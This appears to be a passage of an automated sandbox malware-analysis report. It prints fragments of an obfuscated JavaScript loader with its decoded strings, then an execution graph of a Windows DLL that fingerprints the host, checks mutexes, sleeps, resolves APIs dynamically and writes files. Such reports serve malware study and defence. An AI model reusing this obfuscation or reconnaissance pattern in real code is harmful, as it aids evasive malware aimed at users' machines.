                                                                                                                    • _0x30d96d(5716) ➔ "1uc"
                                                                                                                    • _0x30d96d(3758) ➔ "YC"
                                                                                                                    • _0x30d96d(3755) ➔ "Yz"
                                                                                                                    • _0x30d96d(3647) ➔ "WP"
                                                                                                                    • _0x30d96d(3571) ➔ "VB"
                                                                                                                    • _0x30d96d(3563) ➔ "Vt"
                                                                                                                    62
                                                                                                                    }
                                                                                                                      63
                                                                                                                      _0x5cf663 =
                                                                                                                        64
                                                                                                                        [ function (_0x296f06) {
                                                                                                                        • ("1n 19(28,3y,3A){q o="";q i=0;28F(i<3A-28.28E().28D){o=o+3y;i++}o=o+28;3w(o)}1n 25(t){q 11,27;11=...",62,8226,,,,,,concat,,,,,,,,,,,,,,,,,,,,,var,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,9Ii,time,AAAAAAAAAAAAAAAAA...,0,[object Object]) ➔ "function lPad(str,pad_char,pad_len){var o="";var i=0;while(i<pad_len-str.toString().length){o=o+..."
                                                                                                                        65
                                                                                                                        return _0x17af86[_0x296f06];
                                                                                                                          66
                                                                                                                          } ],
                                                                                                                            67
                                                                                                                            _0x30d96d =
                                                                                                                              68
                                                                                                                              function () {
                                                                                                                              • _0x30d96d(0) ➔ "\w+"
                                                                                                                              69
                                                                                                                              var _0x3694d3 = _0x567f62;
                                                                                                                                70
                                                                                                                                return _0x3694d3 ( a0_0x17871b._0x816139 );
                                                                                                                                • _0x3694d3(5425) ➔ "\w+"
                                                                                                                                71
                                                                                                                                }, _0x5f4629 = 0x1;
                                                                                                                                  72
                                                                                                                                  }
                                                                                                                                    73
                                                                                                                                    ;
                                                                                                                                      74
                                                                                                                                      while (_0x5f4629 -- )
                                                                                                                                        75
                                                                                                                                        {
                                                                                                                                          76
                                                                                                                                          _0x5cf663[_0x5f4629] && ( _0x49ddc4 = _0x49ddc4['replace'] ( new RegExp ( '\x5cb' + _0x30d96d ( _...
                                                                                                                                          • _0x30d96d(0) ➔ "\w+"
                                                                                                                                          77
                                                                                                                                          }
                                                                                                                                            78
                                                                                                                                            return _0x49ddc4;
                                                                                                                                              79
                                                                                                                                              } ( a0_0x586d93 ( 0x2c3a ) + a0_0x586d93 ( 0x2ed5 ) + a0_0x586d93 ( 0x2bdf ) + a0_0x586d93 ( 0x12...
                                                                                                                                                80
                                                                                                                                                {
                                                                                                                                                  81
                                                                                                                                                  } ) ) );
                                                                                                                                                    Reset < >

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:6.3%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                      Signature Coverage:25.9%
                                                                                                                                                      Total number of Nodes:1613
                                                                                                                                                      Total number of Limit Nodes:34
                                                                                                                                                      execution_graph 8891 7ffe1a512ba0 WSAStartup 8892 7ffe1a512c20 8891->8892 8893 7ffe1a512bc0 gethostname 8891->8893 8893->8892 8894 7ffe1a512bd3 gethostbyname 8893->8894 8894->8892 8895 7ffe1a512be3 8894->8895 8895->8892 8896 7ffe1a512bef GetModuleHandleW inet_ntoa 8895->8896 8896->8892 8901 7ffe1a517020 8902 7ffe1a516e40 14 API calls 8901->8902 8905 7ffe1a51703b 8902->8905 8904 7ffe1a517095 8905->8904 8906 7ffe1a5159f0 GetProcessHeap HeapFree 8905->8906 8907 7ffe1a520b20 8908 7ffe1a517f44 _LocaleUpdate::_LocaleUpdate 65 API calls 8907->8908 8909 7ffe1a520b50 8908->8909 8916 7ffe1a5218c0 8909->8916 8914 7ffe1a51c9d0 _cftoe_l 7 API calls 8915 7ffe1a520be4 8914->8915 8917 7ffe1a521924 8916->8917 8923 7ffe1a521934 __mtold12 8916->8923 8918 7ffe1a519b98 _errno 65 API calls 8917->8918 8919 7ffe1a521929 8918->8919 8920 7ffe1a518d80 _invalid_parameter_noinfo 14 API calls 8919->8920 8920->8923 8921 7ffe1a51c9d0 _cftoe_l 7 API calls 8922 7ffe1a520b7e 8921->8922 8924 7ffe1a521308 8922->8924 8923->8921 8927 7ffe1a521387 _call_reportfault 8924->8927 8925 7ffe1a51c9d0 _cftoe_l 7 API calls 8926 7ffe1a520b9a 8925->8926 8926->8914 8927->8925 9473 7ffe1a5148e2 9495 7ffe1a512c40 WSAStartup 9473->9495 9476 7ffe1a511c40 32 API calls 9477 7ffe1a514962 9476->9477 9479 7ffe1a51496f 9477->9479 9525 7ffe1a5159f0 GetProcessHeap HeapFree 9477->9525 9478 7ffe1a5147ba 9483 7ffe1a5122d0 23 API calls 9478->9483 9484 7ffe1a516790 2 API calls 9478->9484 9487 7ffe1a514d23 GetModuleHandleW GetTickCount SleepEx 9478->9487 9488 7ffe1a514d47 9478->9488 9490 7ffe1a516790 GetProcessHeap HeapAlloc 9478->9490 9493 7ffe1a511c40 32 API calls 9478->9493 9527 7ffe1a5159f0 GetProcessHeap HeapFree 9478->9527 9526 7ffe1a5159f0 GetProcessHeap HeapFree 9479->9526 9483->9478 9485 7ffe1a514ce8 OpenMutexW 9484->9485 9485->9478 9486 7ffe1a514d06 CloseHandle 9485->9486 9486->9478 9487->9478 9528 7ffe1a5159f0 GetProcessHeap HeapFree 9488->9528 9490->9478 9493->9478 9496 7ffe1a512c8e gethostname 9495->9496 9497 7ffe1a512ce0 9495->9497 9496->9497 9498 7ffe1a512ca0 gethostbyname 9496->9498 9499 7ffe1a516790 2 API calls 9497->9499 9498->9497 9500 7ffe1a512caf 9498->9500 9501 7ffe1a512cfb RegOpenKeyExW 9499->9501 9500->9497 9502 7ffe1a512cbb GetModuleHandleW inet_ntoa 9500->9502 9503 7ffe1a512e44 9501->9503 9504 7ffe1a512d29 9501->9504 9502->9497 9507 7ffe1a512e4c GlobalMemoryStatusEx 9503->9507 9505 7ffe1a516790 2 API calls 9504->9505 9506 7ffe1a512d35 RegEnumKeyExW 9505->9506 9508 7ffe1a512d77 9506->9508 9519 7ffe1a512e26 9506->9519 9509 7ffe1a512e61 9507->9509 9510 7ffe1a512e69 WideCharToMultiByte 9507->9510 9513 7ffe1a512d80 RegOpenKeyExW 9508->9513 9509->9510 9511 7ffe1a512e9f 9510->9511 9512 7ffe1a512ffb 9510->9512 9529 7ffe1a515980 GetProcessHeap HeapAlloc 9511->9529 9512->9476 9512->9478 9515 7ffe1a512de7 RegEnumKeyExW 9513->9515 9516 7ffe1a512da9 RegQueryValueExW 9513->9516 9515->9513 9515->9519 9516->9519 9520 7ffe1a512ddc RegCloseKey 9516->9520 9517 7ffe1a512e39 RegCloseKey 9517->9503 9519->9517 9520->9515 8928 7ffe1a5149a3 8952 7ffe1a513720 8928->8952 8931 7ffe1a511c40 32 API calls 8932 7ffe1a514962 8931->8932 8933 7ffe1a51496f 8932->8933 8950 7ffe1a5159f0 GetProcessHeap HeapFree 8932->8950 8951 7ffe1a5159f0 GetProcessHeap HeapFree 8933->8951 8937 7ffe1a5122d0 23 API calls 8947 7ffe1a5147ba 8937->8947 8938 7ffe1a516790 2 API calls 8939 7ffe1a514ce8 OpenMutexW 8938->8939 8940 7ffe1a514d06 CloseHandle 8939->8940 8939->8947 8940->8947 8941 7ffe1a514d23 GetModuleHandleW GetTickCount SleepEx 8941->8947 8942 7ffe1a514d47 8960 7ffe1a5159f0 GetProcessHeap HeapFree 8942->8960 8944 7ffe1a516790 GetProcessHeap HeapAlloc 8944->8947 8947->8937 8947->8938 8947->8941 8947->8942 8947->8944 8948 7ffe1a511c40 32 API calls 8947->8948 8959 7ffe1a5159f0 GetProcessHeap HeapFree 8947->8959 8948->8947 8961 7ffe1a513170 8952->8961 8954 7ffe1a51374d 8955 7ffe1a51381e 8954->8955 8991 7ffe1a515980 GetProcessHeap HeapAlloc 8954->8991 8955->8931 8955->8947 8962 7ffe1a516790 2 API calls 8961->8962 8963 7ffe1a51319b RegOpenKeyExW 8962->8963 8964 7ffe1a5131ce 8963->8964 8965 7ffe1a513659 8963->8965 8992 7ffe1a515980 GetProcessHeap HeapAlloc 8964->8992 8965->8954 8993 7ffe1a514b24 8996 7ffe1a513bd0 8993->8996 9005 7ffe1a513a90 8996->9005 9026 7ffe1a5127b0 9005->9026 9027 7ffe1a5127c0 9026->9027 9027->9027 9039 7ffe1a515980 GetProcessHeap HeapAlloc 9027->9039 9041 7ffe1a522124 9044 7ffe1a522148 9041->9044 9045 7ffe1a5221a5 9044->9045 9046 7ffe1a52215b 9044->9046 9100 7ffe1a522774 9045->9100 9048 7ffe1a522161 9046->9048 9049 7ffe1a522177 9046->9049 9056 7ffe1a5229d0 9048->9056 9051 7ffe1a52219e 9049->9051 9052 7ffe1a522197 9049->9052 9087 7ffe1a5221c8 9051->9087 9070 7ffe1a522aa4 9052->9070 9055 7ffe1a522143 9114 7ffe1a523450 9056->9114 9059 7ffe1a522a10 9060 7ffe1a519b98 _errno 65 API calls 9059->9060 9061 7ffe1a522a15 9060->9061 9063 7ffe1a518d80 _invalid_parameter_noinfo 14 API calls 9061->9063 9062 7ffe1a522a25 9126 7ffe1a5232b4 9062->9126 9065 7ffe1a522a1c 9063->9065 9068 7ffe1a51c9d0 _cftoe_l 7 API calls 9065->9068 9066 7ffe1a522a5d 9066->9065 9135 7ffe1a52286c 9066->9135 9069 7ffe1a522a98 9068->9069 9069->9055 9071 7ffe1a523450 _fltout2 65 API calls 9070->9071 9072 7ffe1a522ae4 9071->9072 9073 7ffe1a522ae9 9072->9073 9075 7ffe1a522b01 9072->9075 9074 7ffe1a519b98 _errno 65 API calls 9073->9074 9076 7ffe1a522aee 9074->9076 9078 7ffe1a5232b4 _fptostr 65 API calls 9075->9078 9077 7ffe1a518d80 _invalid_parameter_noinfo 14 API calls 9076->9077 9080 7ffe1a522af5 9077->9080 9079 7ffe1a522b36 9078->9079 9079->9080 9081 7ffe1a522b8b 9079->9081 9083 7ffe1a522b54 9079->9083 9082 7ffe1a51c9d0 _cftoe_l 7 API calls 9080->9082 9171 7ffe1a522578 9081->9171 9085 7ffe1a522bca 9082->9085 9086 7ffe1a52286c _cftof2_l 65 API calls 9083->9086 9085->9055 9086->9080 9088 7ffe1a517f44 _LocaleUpdate::_LocaleUpdate 65 API calls 9087->9088 9089 7ffe1a522211 9088->9089 9090 7ffe1a52221f 9089->9090 9091 7ffe1a522230 9089->9091 9092 7ffe1a519b98 _errno 65 API calls 9090->9092 9093 7ffe1a52223e 9091->9093 9094 7ffe1a522257 9091->9094 9095 7ffe1a522224 9092->9095 9096 7ffe1a519b98 _errno 65 API calls 9093->9096 9098 7ffe1a522774 _cftoe_l 65 API calls 9094->9098 9099 7ffe1a52224f strrchr _call_reportfault 9094->9099 9097 7ffe1a518d80 _invalid_parameter_noinfo 14 API calls 9095->9097 9096->9095 9097->9099 9098->9099 9099->9055 9101 7ffe1a523450 _fltout2 65 API calls 9100->9101 9102 7ffe1a5227b2 9101->9102 9103 7ffe1a5227b7 9102->9103 9104 7ffe1a5227cf 9102->9104 9105 7ffe1a519b98 _errno 65 API calls 9103->9105 9107 7ffe1a5232b4 _fptostr 65 API calls 9104->9107 9106 7ffe1a5227bc 9105->9106 9108 7ffe1a518d80 _invalid_parameter_noinfo 14 API calls 9106->9108 9110 7ffe1a522817 9107->9110 9109 7ffe1a5227c3 9108->9109 9112 7ffe1a51c9d0 _cftoe_l 7 API calls 9109->9112 9110->9109 9111 7ffe1a522578 _cftoe2_l 65 API calls 9110->9111 9111->9109 9113 7ffe1a52285f 9112->9113 9113->9055 9115 7ffe1a523489 __dtold 9114->9115 9142 7ffe1a523508 9115->9142 9118 7ffe1a51f854 $I10_OUTPUT 65 API calls 9119 7ffe1a5234ce 9118->9119 9120 7ffe1a5234f1 9119->9120 9121 7ffe1a5234d2 9119->9121 9123 7ffe1a518da0 _invoke_watson 13 API calls 9120->9123 9122 7ffe1a51c9d0 _cftoe_l 7 API calls 9121->9122 9124 7ffe1a522a0b 9122->9124 9125 7ffe1a523506 9123->9125 9124->9059 9124->9062 9127 7ffe1a5232e5 9126->9127 9128 7ffe1a5232cd 9126->9128 9127->9128 9129 7ffe1a5232ea 9127->9129 9130 7ffe1a519b98 _errno 65 API calls 9128->9130 9132 7ffe1a519b98 _errno 65 API calls 9129->9132 9134 7ffe1a5232de _setenvp _fptostr 9129->9134 9131 7ffe1a5232d2 9130->9131 9133 7ffe1a518d80 _invalid_parameter_noinfo 14 API calls 9131->9133 9132->9131 9133->9134 9134->9066 9136 7ffe1a517f44 _LocaleUpdate::_LocaleUpdate 65 API calls 9135->9136 9137 7ffe1a5228a5 9136->9137 9138 7ffe1a519b98 _errno 65 API calls 9137->9138 9141 7ffe1a5228c0 _call_reportfault _setenvp _fptostr 9137->9141 9139 7ffe1a5228b4 9138->9139 9140 7ffe1a518d80 _invalid_parameter_noinfo 14 API calls 9139->9140 9140->9141 9141->9065 9143 7ffe1a52358e 9142->9143 9144 7ffe1a523611 9143->9144 9145 7ffe1a5235ef 9143->9145 9170 7ffe1a52359d 9143->9170 9148 7ffe1a523641 9144->9148 9151 7ffe1a52361f 9144->9151 9147 7ffe1a51f854 $I10_OUTPUT 65 API calls 9145->9147 9146 7ffe1a51c9d0 _cftoe_l 7 API calls 9150 7ffe1a5234af 9146->9150 9147->9170 9149 7ffe1a523671 9148->9149 9153 7ffe1a52364b 9148->9153 9154 7ffe1a51f854 $I10_OUTPUT 65 API calls 9149->9154 9150->9118 9151->9149 9152 7ffe1a523624 9151->9152 9156 7ffe1a51f854 $I10_OUTPUT 65 API calls 9152->9156 9157 7ffe1a51f854 $I10_OUTPUT 65 API calls 9153->9157 9158 7ffe1a523686 9154->9158 9155 7ffe1a52360c 9159 7ffe1a518da0 _invoke_watson 13 API calls 9155->9159 9160 7ffe1a523638 9156->9160 9161 7ffe1a52365f 9157->9161 9162 7ffe1a523fca 9158->9162 9169 7ffe1a5235af 9158->9169 9163 7ffe1a52363c 9159->9163 9160->9163 9160->9169 9164 7ffe1a523fb5 9161->9164 9161->9169 9165 7ffe1a518da0 _invoke_watson 13 API calls 9162->9165 9168 7ffe1a518da0 _invoke_watson 13 API calls 9163->9168 9166 7ffe1a518da0 _invoke_watson 13 API calls 9164->9166 9167 7ffe1a523fdf 9165->9167 9166->9162 9168->9164 9169->9146 9170->9155 9170->9169 9172 7ffe1a517f44 _LocaleUpdate::_LocaleUpdate 65 API calls 9171->9172 9173 7ffe1a5225b2 9172->9173 9174 7ffe1a5225bc 9173->9174 9175 7ffe1a5225c8 9173->9175 9176 7ffe1a519b98 _errno 65 API calls 9174->9176 9178 7ffe1a5225d9 9175->9178 9181 7ffe1a5225ef _setenvp _fptostr 9175->9181 9177 7ffe1a5225c1 9176->9177 9180 7ffe1a518d80 _invalid_parameter_noinfo 14 API calls 9177->9180 9179 7ffe1a519b98 _errno 65 API calls 9178->9179 9179->9177 9186 7ffe1a5225ea _fptostr 9180->9186 9182 7ffe1a51f854 $I10_OUTPUT 65 API calls 9181->9182 9183 7ffe1a522695 9182->9183 9184 7ffe1a518da0 _invoke_watson 13 API calls 9183->9184 9183->9186 9185 7ffe1a522770 9184->9185 9187 7ffe1a523450 _fltout2 65 API calls 9185->9187 9186->9080 9188 7ffe1a5227b2 9187->9188 9189 7ffe1a5227b7 9188->9189 9190 7ffe1a5227cf 9188->9190 9191 7ffe1a519b98 _errno 65 API calls 9189->9191 9193 7ffe1a5232b4 _fptostr 65 API calls 9190->9193 9192 7ffe1a5227bc 9191->9192 9194 7ffe1a518d80 _invalid_parameter_noinfo 14 API calls 9192->9194 9196 7ffe1a522817 9193->9196 9195 7ffe1a5227c3 9194->9195 9198 7ffe1a51c9d0 _cftoe_l 7 API calls 9195->9198 9196->9195 9197 7ffe1a522578 _cftoe2_l 65 API calls 9196->9197 9197->9195 9199 7ffe1a52285f 9198->9199 9199->9080 9530 7ffe1a5240e7 9533 7ffe1a51dddc LeaveCriticalSection 9530->9533 9534 7ffe1a518f68 9535 7ffe1a517f44 _LocaleUpdate::_LocaleUpdate 65 API calls 9534->9535 9536 7ffe1a518fdc 9535->9536 9537 7ffe1a519b98 _errno 65 API calls 9536->9537 9553 7ffe1a518fe1 _setenvp _woutput_l 9537->9553 9538 7ffe1a518fed 9539 7ffe1a519b98 _errno 65 API calls 9538->9539 9540 7ffe1a518ff2 9539->9540 9541 7ffe1a518d80 _invalid_parameter_noinfo 14 API calls 9540->9541 9542 7ffe1a518ffd 9541->9542 9543 7ffe1a51c9d0 _cftoe_l 7 API calls 9542->9543 9544 7ffe1a519802 9543->9544 9545 7ffe1a519a00 87 API calls write_char 9545->9553 9546 7ffe1a5199b1 9547 7ffe1a51957d DecodePointer 9547->9553 9548 7ffe1a51c5d8 _malloc_crt 65 API calls 9548->9553 9549 7ffe1a5195d7 DecodePointer 9549->9553 9550 7ffe1a5195fc DecodePointer 9550->9553 9552 7ffe1a51bd68 free 65 API calls 9552->9553 9553->9538 9553->9542 9553->9545 9553->9546 9553->9547 9553->9548 9553->9549 9553->9550 9553->9552 9554 7ffe1a519a8c 87 API calls write_string 9553->9554 9555 7ffe1a519a38 87 API calls write_multi_char 9553->9555 9556 7ffe1a51da54 67 API calls _woutput_l 9553->9556 9557 7ffe1a51d6fc 9553->9557 9554->9553 9555->9553 9556->9553 9558 7ffe1a517f44 _LocaleUpdate::_LocaleUpdate 65 API calls 9557->9558 9559 7ffe1a51d70e 9558->9559 9559->9553 9200 7ffe1a5241ab 9203 7ffe1a51cbac 9200->9203 9204 7ffe1a51cbbe LeaveCriticalSection 9203->9204 9205 7ffe1a51cbb1 9203->9205 9205->9204 9560 7ffe1a514a6d 9582 7ffe1a513940 9560->9582 9593 7ffe1a513850 9582->9593 9594 7ffe1a5127b0 2 API calls 9593->9594 9595 7ffe1a51386b 9594->9595 9596 7ffe1a513920 9595->9596 9597 7ffe1a5125b0 4 API calls 9595->9597 9607 7ffe1a515980 GetProcessHeap HeapAlloc 9596->9607 9598 7ffe1a513884 9597->9598 9599 7ffe1a513890 CreateFileW 9598->9599 9606 7ffe1a513913 9598->9606 9601 7ffe1a5138c7 SetFilePointer WriteFile 9599->9601 9602 7ffe1a51390b 9599->9602 9603 7ffe1a513902 CloseHandle 9601->9603 9604 7ffe1a5138f5 9601->9604 9608 7ffe1a5159f0 GetProcessHeap HeapFree 9602->9608 9603->9602 9604->9603 9609 7ffe1a5159f0 GetProcessHeap HeapFree 9606->9609 7187 7ffe1a511ab0 7190 7ffe1a511300 7187->7190 7209 7ffe1a5115b0 7190->7209 7192 7ffe1a511311 7193 7ffe1a51134a 7192->7193 7194 7ffe1a511316 SHGetFolderPathW 7192->7194 7203 7ffe1a511383 7193->7203 7237 7ffe1a511870 7193->7237 7195 7ffe1a511340 7194->7195 7196 7ffe1a511336 7194->7196 7195->7193 7222 7ffe1a5116c0 7195->7222 7282 7ffe1a5113a0 7196->7282 7200 7ffe1a51135e 7202 7ffe1a511870 6 API calls 7200->7202 7206 7ffe1a511374 7200->7206 7201 7ffe1a511354 7201->7200 7246 7ffe1a511900 7201->7246 7205 7ffe1a51136a 7202->7205 7205->7206 7207 7ffe1a511900 5 API calls 7205->7207 7206->7203 7255 7ffe1a5121e0 7206->7255 7207->7206 7210 7ffe1a5115f0 7209->7210 7211 7ffe1a5115c9 7209->7211 7213 7ffe1a511631 7210->7213 7214 7ffe1a5115fc 7210->7214 7314 7ffe1a516790 7211->7314 7218 7ffe1a51165b 7213->7218 7220 7ffe1a5113a0 94 API calls 7213->7220 7214->7210 7317 7ffe1a5166f0 7214->7317 7218->7192 7221 7ffe1a511653 7220->7221 7221->7192 7223 7ffe1a516790 2 API calls 7222->7223 7224 7ffe1a5116de RegOpenKeyExW 7223->7224 7225 7ffe1a51170f 7224->7225 7227 7ffe1a51184e 7224->7227 7226 7ffe1a516790 2 API calls 7225->7226 7228 7ffe1a51172b RegEnumKeyExW 7226->7228 7227->7193 7229 7ffe1a511775 7228->7229 7230 7ffe1a511828 7228->7230 7231 7ffe1a511780 RegOpenKeyExW 7229->7231 7232 7ffe1a511830 RegCloseKey 7230->7232 7233 7ffe1a5117e2 RegEnumKeyExW 7231->7233 7234 7ffe1a5117ad RegQueryValueExW 7231->7234 7232->7227 7233->7230 7233->7231 7235 7ffe1a5117d2 7234->7235 7236 7ffe1a5117d4 RegCloseKey 7234->7236 7235->7236 7236->7233 7238 7ffe1a516790 2 API calls 7237->7238 7239 7ffe1a511886 GetModuleHandleW 7238->7239 7240 7ffe1a51189d 7239->7240 7241 7ffe1a5166f0 2 API calls 7240->7241 7242 7ffe1a5118a9 GetProcAddress 7241->7242 7243 7ffe1a5118c3 7242->7243 7244 7ffe1a5118de GetSystemInfo 7243->7244 7245 7ffe1a5118cd GetNativeSystemInfo 7243->7245 7244->7201 7245->7201 7247 7ffe1a516790 2 API calls 7246->7247 7248 7ffe1a511916 GetModuleHandleW 7247->7248 7249 7ffe1a51192d 7248->7249 7250 7ffe1a5166f0 2 API calls 7249->7250 7251 7ffe1a511939 GetProcAddress 7250->7251 7322 7ffe1a516830 7251->7322 7253 7ffe1a511953 GlobalMemoryStatusEx 7254 7ffe1a511966 7253->7254 7254->7200 7256 7ffe1a516790 2 API calls 7255->7256 7257 7ffe1a512205 SetLastError CreateMutexExW 7256->7257 7258 7ffe1a5122ae 7257->7258 7259 7ffe1a512229 GetLastError 7257->7259 7260 7ffe1a512285 7259->7260 7261 7ffe1a512236 7259->7261 7345 7ffe1a517d30 7260->7345 7262 7ffe1a516790 2 API calls 7261->7262 7265 7ffe1a512247 7262->7265 7264 7ffe1a51228a 7267 7ffe1a512291 7264->7267 7268 7ffe1a51229d 7264->7268 7324 7ffe1a517bb0 7265->7324 7270 7ffe1a515670 148 API calls 7267->7270 7350 7ffe1a5145e0 7268->7350 7273 7ffe1a512296 7270->7273 7272 7ffe1a512276 7274 7ffe1a5122a5 CloseHandle 7272->7274 7273->7268 7273->7274 7274->7258 7275 7ffe1a517d30 9 API calls 7276 7ffe1a51225b 7275->7276 7277 7ffe1a51226e 7276->7277 7278 7ffe1a512262 7276->7278 7280 7ffe1a5145e0 78 API calls 7277->7280 7380 7ffe1a515670 7278->7380 7280->7272 7283 7ffe1a5113c5 7282->7283 7284 7ffe1a5113ec 7282->7284 7285 7ffe1a516790 2 API calls 7283->7285 7286 7ffe1a511423 7284->7286 7290 7ffe1a5113f5 7284->7290 7287 7ffe1a5113d1 LoadLibraryW 7285->7287 7289 7ffe1a51145a 7286->7289 7297 7ffe1a51142c 7286->7297 7287->7290 7288 7ffe1a5166f0 2 API calls 7291 7ffe1a511401 GetProcAddress 7288->7291 7293 7ffe1a511491 7289->7293 7294 7ffe1a511463 7289->7294 7290->7284 7290->7288 7291->7297 7292 7ffe1a5166f0 2 API calls 7298 7ffe1a511438 GetProcAddress 7292->7298 7296 7ffe1a516790 2 API calls 7293->7296 7294->7289 7295 7ffe1a5166f0 2 API calls 7294->7295 7299 7ffe1a51146f GetProcAddress 7295->7299 7300 7ffe1a51149d 7296->7300 7297->7286 7297->7292 7298->7294 7301 7ffe1a516830 7299->7301 8175 7ffe1a5112d0 7300->8175 7301->7293 7303 7ffe1a5114b8 7304 7ffe1a5114c0 FindFirstFileW 7303->7304 7305 7ffe1a5114e0 7304->7305 7306 7ffe1a511585 7304->7306 7307 7ffe1a516790 2 API calls 7305->7307 7306->7195 7308 7ffe1a5114ec 7307->7308 7309 7ffe1a516790 2 API calls 7308->7309 7311 7ffe1a5114fb FindNextFileW 7309->7311 7312 7ffe1a51156c 7311->7312 7313 7ffe1a51157c FindClose 7312->7313 7313->7306 7320 7ffe1a515980 GetProcessHeap HeapAlloc 7314->7320 7321 7ffe1a515980 GetProcessHeap HeapAlloc 7317->7321 7323 7ffe1a516839 _call_reportfault 7322->7323 7323->7253 7325 7ffe1a517bf4 7324->7325 7326 7ffe1a517bcd 7324->7326 7328 7ffe1a517c2b 7325->7328 7329 7ffe1a517bfd 7325->7329 7327 7ffe1a516790 2 API calls 7326->7327 7331 7ffe1a517bd9 LoadLibraryW 7327->7331 7330 7ffe1a517c5b 7328->7330 7339 7ffe1a517c34 7328->7339 7329->7325 7332 7ffe1a5166f0 2 API calls 7329->7332 7334 7ffe1a517c92 GetCommandLineW CommandLineToArgvW 7330->7334 7340 7ffe1a517c64 7330->7340 7331->7329 7335 7ffe1a517c09 GetProcAddress 7332->7335 7333 7ffe1a516790 2 API calls 7336 7ffe1a517c40 LoadLibraryW 7333->7336 7338 7ffe1a512252 7334->7338 7344 7ffe1a517cae LocalFree 7334->7344 7335->7339 7336->7340 7337 7ffe1a5166f0 2 API calls 7341 7ffe1a517c70 GetProcAddress 7337->7341 7338->7272 7338->7275 7339->7328 7339->7333 7340->7330 7340->7337 7343 7ffe1a516830 7341->7343 7343->7334 7344->7338 7346 7ffe1a516790 2 API calls 7345->7346 7347 7ffe1a517d46 7346->7347 7348 7ffe1a517bb0 9 API calls 7347->7348 7349 7ffe1a517d51 7348->7349 7349->7264 7351 7ffe1a516790 2 API calls 7350->7351 7352 7ffe1a514615 GetVolumeInformationW 7351->7352 7353 7ffe1a516830 7352->7353 7354 7ffe1a514645 7 API calls 7353->7354 7355 7ffe1a5146c0 7354->7355 7408 7ffe1a515a20 7355->7408 7358 7ffe1a5166f0 2 API calls 7359 7ffe1a514725 7358->7359 7360 7ffe1a516790 2 API calls 7359->7360 7361 7ffe1a514734 7360->7361 7444 7ffe1a5128f0 7361->7444 7365 7ffe1a514d4f 7569 7ffe1a5159f0 GetProcessHeap HeapFree 7365->7569 7366 7ffe1a514d64 7366->7274 7368 7ffe1a516790 GetProcessHeap HeapAlloc 7372 7ffe1a5147a1 7368->7372 7370 7ffe1a516790 2 API calls 7371 7ffe1a514ce8 OpenMutexW 7370->7371 7371->7372 7373 7ffe1a514d06 CloseHandle 7371->7373 7372->7365 7372->7368 7372->7370 7374 7ffe1a514d23 GetModuleHandleW GetTickCount SleepEx 7372->7374 7375 7ffe1a514d47 7372->7375 7379 7ffe1a5148ce 7372->7379 7478 7ffe1a511c40 7372->7478 7567 7ffe1a5159f0 GetProcessHeap HeapFree 7372->7567 7373->7372 7374->7372 7568 7ffe1a5159f0 GetProcessHeap HeapFree 7375->7568 7379->7372 7547 7ffe1a5122d0 7379->7547 7381 7ffe1a516790 2 API calls 7380->7381 7382 7ffe1a51569b CreateMutexW 7381->7382 7383 7ffe1a5156b3 Sleep CloseHandle 7382->7383 7384 7ffe1a5156c7 7382->7384 7383->7384 7641 7ffe1a515160 7384->7641 7386 7ffe1a516790 2 API calls 7388 7ffe1a5156d4 7386->7388 7388->7386 7389 7ffe1a51570a Sleep GetTickCount 7388->7389 7667 7ffe1a517740 CoInitializeEx 7388->7667 7679 7ffe1a517f00 7389->7679 7409 7ffe1a515a3e 7408->7409 7410 7ffe1a515a65 7408->7410 7412 7ffe1a516790 2 API calls 7409->7412 7411 7ffe1a515a9d 7410->7411 7421 7ffe1a515a6f 7410->7421 7414 7ffe1a515ace 7411->7414 7415 7ffe1a515aa7 7411->7415 7416 7ffe1a515a4a LoadLibraryW 7412->7416 7413 7ffe1a5166f0 2 API calls 7417 7ffe1a515a7b GetProcAddress 7413->7417 7419 7ffe1a515b06 7414->7419 7420 7ffe1a515ad8 7414->7420 7415->7411 7418 7ffe1a516790 2 API calls 7415->7418 7416->7421 7417->7415 7424 7ffe1a515ab3 LoadLibraryW 7418->7424 7422 7ffe1a515b3e 7419->7422 7423 7ffe1a515b10 7419->7423 7420->7414 7425 7ffe1a5166f0 2 API calls 7420->7425 7421->7410 7421->7413 7427 7ffe1a515b6f 7422->7427 7428 7ffe1a515b48 7422->7428 7423->7419 7426 7ffe1a5166f0 2 API calls 7423->7426 7424->7420 7429 7ffe1a515ae4 GetProcAddress 7425->7429 7430 7ffe1a515b1c GetProcAddress 7426->7430 7432 7ffe1a515ba7 _call_reportfault 7427->7432 7433 7ffe1a515b79 7427->7433 7428->7422 7431 7ffe1a516790 2 API calls 7428->7431 7429->7423 7430->7428 7434 7ffe1a515b54 LoadLibraryW 7431->7434 7436 7ffe1a515bb9 RtlGetVersion 7432->7436 7433->7427 7435 7ffe1a5166f0 2 API calls 7433->7435 7434->7433 7437 7ffe1a515b85 GetProcAddress 7435->7437 7438 7ffe1a515bf9 GetNativeSystemInfo 7436->7438 7439 7ffe1a515bfd GetSystemInfo 7436->7439 7440 7ffe1a516830 7437->7440 7442 7ffe1a515c03 7438->7442 7439->7442 7440->7432 7441 7ffe1a514719 7441->7358 7442->7441 7443 7ffe1a515cfb GetSystemMetrics 7442->7443 7443->7441 7570 7ffe1a512500 WideCharToMultiByte 7444->7570 7447 7ffe1a512b80 7447->7366 7467 7ffe1a512850 7447->7467 7448 7ffe1a512500 4 API calls 7449 7ffe1a51292d 7448->7449 7450 7ffe1a512b70 7449->7450 7451 7ffe1a512500 4 API calls 7449->7451 7581 7ffe1a5159f0 GetProcessHeap HeapFree 7450->7581 7453 7ffe1a51294e 7451->7453 7454 7ffe1a512b60 7453->7454 7455 7ffe1a512500 4 API calls 7453->7455 7580 7ffe1a5159f0 GetProcessHeap HeapFree 7454->7580 7457 7ffe1a51296f 7455->7457 7458 7ffe1a512b50 7457->7458 7460 7ffe1a512500 4 API calls 7457->7460 7579 7ffe1a5159f0 GetProcessHeap HeapFree 7458->7579 7461 7ffe1a512990 7460->7461 7462 7ffe1a512b48 7461->7462 7577 7ffe1a515980 GetProcessHeap HeapAlloc 7461->7577 7578 7ffe1a5159f0 GetProcessHeap HeapFree 7462->7578 7468 7ffe1a51286b 7467->7468 7583 7ffe1a515980 GetProcessHeap HeapAlloc 7468->7583 7479 7ffe1a511ca1 7478->7479 7480 7ffe1a511c7a 7478->7480 7482 7ffe1a511cd8 7479->7482 7483 7ffe1a511caa 7479->7483 7481 7ffe1a516790 2 API calls 7480->7481 7486 7ffe1a511c86 LoadLibraryExW 